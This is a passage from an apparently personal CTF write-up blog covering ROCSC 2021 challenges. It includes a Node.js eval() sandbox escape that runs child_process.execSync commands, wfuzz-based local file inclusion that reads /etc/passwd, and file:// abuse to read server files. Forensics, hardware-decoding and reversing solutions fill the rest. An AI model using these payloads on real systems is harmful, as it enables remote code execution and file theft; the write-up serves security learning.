<p>I didn’t know how to bypass the <strong>eval()</strong> so I started to search for past writeups that look like this and I found this one from GoogleCTF: <a target="_blank" rel="noopener" href="https://blog.orange.tw/2018/06/google-ctf-2018-quals-web-gcalc.html">https://blog.orange.tw/2018/06/google-ctf-2018-quals-web-gcalc.html</a><br>I modified it a little bit and with a little bit of help from a past payload that I had I’ve made this one: </p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">?a&#x3D;this.constructor.constructor(%22return%20process%22)().mainModule.require(%27child_process%27).execSync%20(%27ls%27)&amp;b&#x3D;sda</code></pre>
<p>But guess what ? The payload it’s not working so after some time poking with this and trying to bypass the filtering or the blacklist I found that if you enter a “ “ after execSync you can bypass this and earn RCE.</p>
<img src="/2021/12/08/rocsc-2021/20210830143054.png" class="">

<p>And the flag is under server.js.</p>
<h2 id="file-crawler-50-Web"><a href="#file-crawler-50-Web" class="headerlink" title="file-crawler(50): Web"></a>file-crawler(50): Web</h2><h4 id="Proof-of-Flag-7"><a href="#Proof-of-Flag-7" class="headerlink" title="Proof of Flag"></a>Proof of Flag</h4><p>CTF{0caec419d3ad1e1f052f06bae84d9106b77d166aae899c6dbe1355d10a4ba854}</p>
<h4 id="Summary-7"><a href="#Summary-7" class="headerlink" title="Summary"></a>Summary</h4><p>We get a simple web server <strong>Werkzeug&#x2F;1.0.1 Python&#x2F;2.7.17</strong> with a image located in the center.<br>After poking around with <strong>gobuster, nikto, arjun</strong> etc. I found the <strong>&#x2F;local?</strong> parameter and that hit my head. I remember looking in the source code and seeing a strange path to the image, so I started to play with it manually first and I got the content of <strong>&#x2F;etc&#x2F;passwd</strong></p>
<img src="/2021/12/08/rocsc-2021/20210830143625.png" class="">

<h4 id="Proof-of-Solving-7"><a href="#Proof-of-Solving-7" class="headerlink" title="Proof of Solving"></a>Proof of Solving</h4><p>I used this command in order to fuzz the possible LFI combinations:</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">wfuzz -c -w fuzz.txt --hw 28 http:&#x2F;&#x2F;35.246.178.49:30603&#x2F;local?image_name&#x3D;FUZZ</code></pre>

<p>We found a lot of interesting stuff but after checking every single one of them we found nothing…<br>So I started to crawl a list of linux subsystem files and FUZZ after them…<br>After a little bit of time we got a hit on <strong>&#x2F;tmp&#x2F;flag</strong><br>Inside was the <em>hidden</em> flag</p>
<h2 id="Little-endian-photo-340-Forensics"><a href="#Little-endian-photo-340-Forensics" class="headerlink" title="Little-endian-photo(340): Forensics"></a>Little-endian-photo(340): Forensics</h2><h4 id="Proof-of-Flag-8"><a href="#Proof-of-Flag-8" class="headerlink" title="Proof of Flag"></a>Proof of Flag</h4><p>ctf{112687d319c48cc38709a90b34d6df10904711b93a74b27f73d9382ff64053a0}</p>
<h4 id="Summary-8"><a href="#Summary-8" class="headerlink" title="Summary"></a>Summary</h4><p>We get a broken <strong>PNG</strong> image with lots of data in it.<br>The only problem that we have is that we don’t know the IMAGExSIZE.</p>
<h4 id="Proof-of-Solving-8"><a href="#Proof-of-Solving-8" class="headerlink" title="Proof of Solving"></a>Proof of Solving</h4><p>There was a little bit of guess but not that much.<br>We know that there are <strong>1240800</strong> <em>pixels</em>.<br>We know that normally the photo should be 1000x1000 ( normally because <strong>MODERN</strong> times)<br>So we need to find a number that multiplied with 1000 should be equal to the number of pixels.</p>
<h4 id="Proof-of-Code-3"><a href="#Proof-of-Code-3" class="headerlink" title="Proof of Code"></a>Proof of Code</h4><pre class="line-numbers language-python" data-language="python"><code class="language-python">#!&#x2F;usr&#x2F;bin&#x2F;python
from PIL import Image

def _saveImage(img, imgsize, destFile):
        mode &#x3D; &#39;RGBA&#39;
        arr &#x3D; img.reshape(img.shape[0]*img.shape[1], img.shape[2])
        if len(arr[0]) &#x3D;&#x3D; 3:
                arr &#x3D; np.c_[arr, 255*np.ones((len(arr),1), np.uint8)]
        img &#x3D;  Image.frombuffer(mode, imgsize, arr.tostring(), &#39;raw&#39;, mode, 0, 1)
        img.save(destFile)

def main():
        img &#x3D; open(&quot;&#x2F;mnt&#x2F;c&#x2F;Users&#x2F;iulia&#x2F;Desktop&#x2F;CrossFolder&#x2F;ceva.png&quot;, &quot;rb&quot;)
        pixels &#x3D; list(img)
        pixels &#x3D; b&quot;&quot;.join([x for x in pixels])
        #print(pixels)

        #img &#x3D; Image.frombuffer(&quot;L&quot;, (2000, 2000), pixels)
        data &#x3D; open(&quot;ceva.png&quot;, &quot;rb&quot;).read()
        img &#x3D; Image.frombuffer(data &#x3D; data, mode &#x3D; &quot;RGB&quot;, size &#x3D; (1175, 1056)).rotate(180)
        #image &#x3D; Image.frombytes(&quot;RGB&quot;, (1175, 1056), bytes(bytearray(img2)))
        img.save(&quot;asddd.png&quot;)

        #with open(&quot;altceva.png&quot;, &quot;wb&quot;) as f:
        #       for pixel in img2:
        #               f.write(pixel)

if __name__&#x3D;&#x3D;&quot;__main__&quot;:
        main()</code></pre>

<h2 id="reccon-160-Web"><a href="#reccon-160-Web" class="headerlink" title="reccon(160): Web"></a>reccon(160): Web</h2><h4 id="Proof-of-Flag-9"><a href="#Proof-of-Flag-9" class="headerlink" title="Proof of Flag"></a>Proof of Flag</h4><p>CTF{486cdfe3a59141aca752fb10b44c70facca9c5b1d7be444aa840d14148030e66}</p>
<h4 id="Summary-9"><a href="#Summary-9" class="headerlink" title="Summary"></a>Summary</h4><p>We get a webserver again with just a simple image in the center.</p>
<h4 id="Proof-of-Solving-9"><a href="#Proof-of-Solving-9" class="headerlink" title="Proof of Solving"></a>Proof of Solving</h4><p>So we start with our basic enumeration using gobuster. We didn’t find anything interesting so the next scan is <strong>FUZZING</strong> for arguments.<br>So launch <strong>ARJUN</strong> and we find that there are a couple of arguments.<br>We enter them manually and we can see that at <strong>&#x2F;?m</strong> we get the flag</p>
<img src="/2021/12/08/rocsc-2021/20210830145349.png" class="">

<h4 id="Proof-of-Code-4"><a href="#Proof-of-Code-4" class="headerlink" title="Proof of Code"></a>Proof of Code</h4><pre class="line-numbers language-python" data-language="python"><code class="language-python">import requests

r &#x3D; requests.get(&quot;http:&#x2F;&#x2F;34.141.59.125:32391&#x2F;?m&quot;)
print(r.content)</code></pre>

<h2 id="RGB-led-matrix-320-Misc"><a href="#RGB-led-matrix-320-Misc" class="headerlink" title="RGB_led_matrix(320): Misc"></a>RGB_led_matrix(320): Misc</h2><h4 id="Proof-of-Flag-10"><a href="#Proof-of-Flag-10" class="headerlink" title="Proof of Flag"></a>Proof of Flag</h4><p>CTF{29ca0ea1e1a1117fc8007bfdbadd395a5945bc61feea659f1791b30b066f9363}</p>
<h4 id="Summary-10"><a href="#Summary-10" class="headerlink" title="Summary"></a>Summary</h4><p>We have a log communication between a micro-controller and the display with a DS Logic Analyzer.</p>
<h4 id="Proof-of-Solving-10"><a href="#Proof-of-Solving-10" class="headerlink" title="Proof of Solving"></a>Proof of Solving</h4><p>We need to open <strong>PulseView</strong> and add a decoder.<br>The decoder we need to add is <strong>rgb led ws281x</strong><br>After that we export it and we try to make a photo.<br>So I found a script on google and modify it a little bit.</p>
<h4 id="Proof-of-Code-5"><a href="#Proof-of-Code-5" class="headerlink" title="Proof of Code"></a>Proof of Code</h4><pre class="line-numbers language-python" data-language="python"><code class="language-python">#!&#x2F;usr&#x2F;bin&#x2F;python
white &#x3D; &#39;\x1b[7m  \x1b[0m&#39;
black &#x3D; &#39;\x1b[49m  \x1b[0m&#39;


with open(&#39;adno&#39;, &#39;r&#39;) as f:
    data &#x3D; f.readlines()

pixels &#x3D; []

def chunks(lst, n):
    for i in range(0, len(lst), n):
        yield lst[i:i + n]

for line in data:
    byte &#x3D; int(line[-7:], 16)
    if byte !&#x3D; 0:
        byte &#x3D; 1
    pixels.append(byte)

pixels &#x3D; list(chunks(pixels, 248))
pixels.reverse()

matrix &#x3D; 8 * [31 * [0]]

for i in range(len(pixels)):
    chunk &#x3D; pixels[i]
    chunk &#x3D; list(chunks(chunk, 8))
    chunk.reverse()
    for j in range(len(chunk[-7:])):
        line &#x3D; chunk[j]
        if j % 2 &#x3D;&#x3D; 1:
            line.reverse()

        for c in line:
            if c &#x3D;&#x3D; 0:
                print(white, end&#x3D;&#39;&#39;)
            else:
                print(black, end&#x3D;&#39;&#39;)

        print()</code></pre>

<h2 id="OLED-380-Misc"><a href="#OLED-380-Misc" class="headerlink" title="OLED(380): Misc"></a>OLED(380): Misc</h2><h4 id="Proof-of-Flag-11"><a href="#Proof-of-Flag-11" class="headerlink" title="Proof of Flag"></a>Proof of Flag</h4><h4 id="Summary-11"><a href="#Summary-11" class="headerlink" title="Summary"></a>Summary</h4><p>We have a communication between OLED and the micro-controller.<br>We can see it using DSView.<br>After poking with the parameters for a couple of hours the best combination decoders and arguments are: 1,4,2 and active-high<br>It needs to be <strong>ACTIVE-HIGH</strong> because the <strong>ACTIVE-LOW</strong> will remove and strip some pixels from the image so you won’t be able to extract the data from the QR Code.<br>But you can know that those are good just after you export the data as <strong>.csv</strong> and try it.</p>
<img src="/2021/12/08/rocsc-2021/20210830164611.png" class="">

<h4 id="Proof-of-Solving-11"><a href="#Proof-of-Solving-11" class="headerlink" title="Proof of Solving"></a>Proof of Solving</h4><p>But how ? How should I script that ? Well if you search for oled ctf writeups you can find a lot of links and from one of them I got the script.<br>You just need to change the <strong>N_COLUMNS</strong> and something else and you are ready for using it.<br>You can see that it’s giving you a QR Code<br>I scanned it with QRScanner from my IPhone.</p>
<img src="/2021/12/08/rocsc-2021/20210830205735.png" class="">

<h4 id="Proof-of-Code-6"><a href="#Proof-of-Code-6" class="headerlink" title="Proof of Code"></a>Proof of Code</h4><pre class="line-numbers language-python" data-language="python"><code class="language-python">import pandas as pd
import matplotlib.pyplot as plt 
import numpy as np

N_PAGES &#x3D; 8
N_ROWS &#x3D; 64
N_COLUMNS &#x3D; 131

def show_lcd(data):
  screen &#x3D; []
  for i in range(N_ROWS):
    screen.append([0] * N_COLUMNS)

  for i in range(N_PAGES):
    for j in range(N_COLUMNS):
      # Convert each byte to a binary string
      bits &#x3D; &quot;&#123;0:08b&#125;&quot;.format(data[N_COLUMNS*i+j])[::-1]
      for l, b in enumerate(bits):
        # Draw pixels into the screen
        screen[N_PAGES*i+l][j] &#x3D; int(b)

  X &#x3D; np.array(screen)
  plt.imshow(X, cmap&#x3D;&quot;gray&quot;) 
  plt.show() 


data &#x3D; pd.read_csv(&#39;data.csv&#39;)[&#39;mosi&#39;]
data &#x3D; data[4165:] # Remove the first 25 bytes
data &#x3D; list(data.map(lambda h: int(h, 16))) # Convert hex string to list of bytes

sequence_size &#x3D; N_PAGES * N_COLUMNS
for i in range(6):
  show_lcd(data[sequence_size*i:sequence_size*(i+1)])</code></pre>

<h2 id="speed-50-Rev"><a href="#speed-50-Rev" class="headerlink" title="speed(50): Rev"></a>speed(50): Rev</h2><h4 id="Proof-of-Flag-12"><a href="#Proof-of-Flag-12" class="headerlink" title="Proof of Flag"></a>Proof of Flag</h4><p>CTF{cd60564f35f0e0667ebca28c67faf5f0327ee74560e9c1058cfbe42c9be194e8}</p>
<h4 id="Summary-12"><a href="#Summary-12" class="headerlink" title="Summary"></a>Summary</h4><p>We get an executable that it’s initializing a variable to rand()<br>Inside nothing_here() we have the seed so basically it’s pretty easy to solve this one.<br>Given the seed used to generate the random number is known to us, we can generate the exact same numbers by using the same seed in our rand() function call which will allow us to predict the values generated by binary</p>
<h4 id="Proof-of-Solving-12"><a href="#Proof-of-Solving-12" class="headerlink" title="Proof of Solving"></a>Proof of Solving</h4><p>This is the code that we need to exploit</p>
<img src="/2021/12/08/rocsc-2021/20210830184439.png" class="">

<h4 id="Proof-of-Code-7"><a href="#Proof-of-Code-7" class="headerlink" title="Proof of Code"></a>Proof of Code</h4><pre class="line-numbers language-python" data-language="python"><code class="language-python">import ctypes
LIBC &#x3D; ctypes.cdll.LoadLibrary(&#39;&#x2F;lib&#x2F;x86_64-linux-gnu&#x2F;libc.so.6&#39;)
LIBC.srand(0x11C4)
v1 &#x3D; LIBC.rand()
v2 &#x3D; 0
v1 ^ v2 ^ 0x539
import hashlib
num &#x3D; hashlib.sha256((str(v1 ^ v2 ^ 0x539)).encode(&quot;utf-8&quot;)).hexdigest()</code></pre>

<h2 id="where-do-you-go-300-Misc"><a href="#where-do-you-go-300-Misc" class="headerlink" title="where-do-you-go(300): Misc"></a>where-do-you-go(300): Misc</h2><h4 id="Proof-of-Flag-13"><a href="#Proof-of-Flag-13" class="headerlink" title="Proof of Flag"></a>Proof of Flag</h4><p>ctf{83ac8f43b6dc92217de38ce84b5b3bb4e067642dfbf76a35dcf03cbb1508b956}</p>
<h4 id="Summary-13"><a href="#Summary-13" class="headerlink" title="Summary"></a>Summary</h4><p>We get a server and a port were we need to connect to.<br>After connecting with <code>nc</code> we can see that the server is asking us for some CVE-IDs.</p>
<img src="/2021/12/08/rocsc-2021/20210830153448.png" class="">

<p>So the only think I though I could do is a crawler that get’s the questions and reply them with the hope that after a couple of questions I will get the flag.</p>
<h4 id="Proof-of-Solving-13"><a href="#Proof-of-Solving-13" class="headerlink" title="Proof of Solving"></a>Proof of Solving</h4><p>Firstly I tried with just requesting some questions from <strong>CVE.MITRE</strong> but after some questions I would get an error because that question wasn’t present on the CVE.MITRE website.<br>So I addopted a new <em>technique</em> that uses 2 websites and searches for the CVE-ID but also that was failing after some questions.<br>So I searched a database with all <strong>2019-2020-2021</strong> CVEs and imported them locally. (<a target="_blank" rel="noopener" href="https://nvd.nist.gov/vuln/data-feeds">https://nvd.nist.gov/vuln/data-feeds</a>)</p>
<h4 id="Proof-of-Code-8"><a href="#Proof-of-Code-8" class="headerlink" title="Proof of Code"></a>Proof of Code</h4><pre class="line-numbers language-python" data-language="python"><code class="language-python">#!&#x2F;usr&#x2F;bin&#x2F;python
from pwn import *
import json

proxies &#x3D; &#123;
  &#39;http&#39;: &#39;http:&#x2F;&#x2F;localhost:8080&#39;,
&#125;

db &#x3D; &#123;&#125;

def json_cve(file):
        f &#x3D; open(file, &quot;r&quot;)
        data &#x3D; json.load(f)
        cves &#x3D; data[&quot;CVE_Items&quot;]
        for cve in cves:
                id &#x3D; cve[&quot;cve&quot;][&quot;CVE_data_meta&quot;][&quot;ID&quot;]
                desc &#x3D; cve[&quot;cve&quot;][&quot;description&quot;][&quot;description_data&quot;][0][&quot;value&quot;].encode(&quot;ascii&quot;, &quot;ignore&quot;).decode()
                db[desc] &#x3D; id

def search(desc):
        return db[desc]

def main():
        json_cve(&quot;nvdcve-1.1-2019.json&quot;)
        json_cve(&quot;nvdcve-1.1-2020.json&quot;)
        json_cve(&quot;nvdcve-1.1-2021.json&quot;)

        i &#x3D; 1
        r &#x3D; remote(&quot;34.107.45.139&quot;, 32403)
        while True:
                i +&#x3D; 1
                content &#x3D; r.recvline()
                content &#x3D; content.decode().strip(&quot;\r\n&quot;)

                if(&quot;bye&quot; in content):
                        print(content)
                        break
                cve &#x3D; search(content)
                if(&quot;CTF&#123;&quot; in content):
                        print(content)
                        break

                #content &#x3D; r.recvuntil(b&quot;What do you think:&quot;)
                print(content, i)
                r.sendlineafter(&quot;What do you think:&quot;, cve)
        r.close()

if __name__&#x3D;&#x3D;&quot;__main__&quot;:
        while True:
                main()</code></pre>

<h2 id="ultra-crawl-210-Web"><a href="#ultra-crawl-210-Web" class="headerlink" title="ultra-crawl(210): Web"></a>ultra-crawl(210): Web</h2><h4 id="Proof-of-Flag-14"><a href="#Proof-of-Flag-14" class="headerlink" title="Proof of Flag"></a>Proof of Flag</h4><p>ctf{d8b7e522b0ab04101e78ab1c6ff68c4cb2f30ce9d4427d4cd77bc19238367933}</p>
<h4 id="Summary-14"><a href="#Summary-14" class="headerlink" title="Summary"></a>Summary</h4><p>We get a webserver with crawling functionality.</p>
<img src="/2021/12/08/rocsc-2021/20210830152320.png" class="">

<h4 id="Proof-of-Solving-14"><a href="#Proof-of-Solving-14" class="headerlink" title="Proof of Solving"></a>Proof of Solving</h4><p>If you participate in CTF contests you know that this kind of web challenge it’s pretty popular and almost the same every time.<br>You can abuse the <strong>file:&#x2F;&#x2F;&#x2F;&#x2F;</strong> “protocol” in order to exfiltrate data and get the flag.</p>
<img src="/2021/12/08/rocsc-2021/20210830152637.png" class="">

<p>You can read the source code and find that the flag is in <strong>sir-a-random-folder-for-the-flag&#x2F;flag.txt</strong><br>After reading the source code you can notice that in order to get the flag you need to have a <strong>HOST</strong> header with <em>company.tld</em>.</p>
<img src="/2021/12/08/rocsc-2021/20210830153009.png" class="">

<h2 id="el-picasso-150-Rev"><a href="#el-picasso-150-Rev" class="headerlink" title="el-picasso(150): Rev"></a>el-picasso(150): Rev</h2><h4 id="Proof-of-Flag-15"><a href="#Proof-of-Flag-15" class="headerlink" title="Proof of Flag"></a>Proof of Flag</h4><p>ctf{1ff757b6b99229db80a208563aa98dfb5e4a592b34551ba44b63038c7bd442af}</p>
<h4 id="Summary-15"><a href="#Summary-15" class="headerlink" title="Summary"></a>Summary</h4><p>We get an executable that we need to reverse.<br>When we try to disassemble it with <strong>IDA</strong> we can see that we get an error.<br>After searching the error on google we can see that there could be a problem with the <strong>nodes</strong><br>We go to Options-&gt;General-&gt;Graph and modify the nodes to a bigger number.<br>And we get a QR on Graph View.<br>We can it via QRScanner from IPhone and we get the flag.</p>
<h4 id="Proof-of-Solving-15"><a href="#Proof-of-Solving-15" class="headerlink" title="Proof of Solving"></a>Proof of Solving</h4><img src="/2021/12/08/rocsc-2021/20210830151515.png" class=""></article><section class="jump-container is-flex is-justify-content-space-between my-6"><!-- em is empty placeholder--><a class="button is-default" href="/2021/12/09/secret/" title="Secret"><i class="iconfont icon-prev mr-2 has-text-grey"></i><span class="has-text-weight-semibold">Previous: Secret</span></a><a class="button is-default" href="/2021/12/08/horizontall/" title="Horizontall"><span class="has-text-weight-semibold">Next: Horizontall</span><i class="iconfont icon-next ml-2 has-text-grey"></i></a></section><article class="mt-6 comment-container"><script async repo="Haojen/Claudia-theme-blog" src="https://utteranc.es/client.js" issue-term="pathname" theme="preferred-color-scheme"></script></article></div></div></main></main><footer class="is-flex is-flex-direction-column is-align-items-center is-flex-shrink-0 is-family-serif"><section class="sns-container"><a title="twitter" target="_blank" rel="noopener nofollow" href="//twitter.com/IulianSiPunct"><i class="iconfont icon-twitter"></i></a><!-- Github--><a title="github" target="_blank" rel="noopener nofollow" href="//github.com/ischyr"><i class="iconfont icon-github"></i></a><!-- Ins--><!-- RSS--><!-- 知乎--><!-- 领英--><a title="linkedin" target="_blank" rel="noopener nofollow" href="//www.linkedin.com/in/iulian-schifirnet-238049201/"><i class="iconfont icon-linkedin"></i></a><!-- 脸书--></section><p><span>Copyright ©</span><span> Ischyr</span></p><div class="is-flex is-justify-content-center is-flex-wrap-wrap"><div style="margin-top: 2px"></div></div><div><span></span></div></footer><script async defer src="https://buttons.github.io/buttons.js"></script><script src="/js/jquery-3.6.1.min.js"></script><script src="/js/jquery-fancybox.min.js"></script><script src="/js/img_zoom.js"></script><script src="/js/post.js"></script></body></html>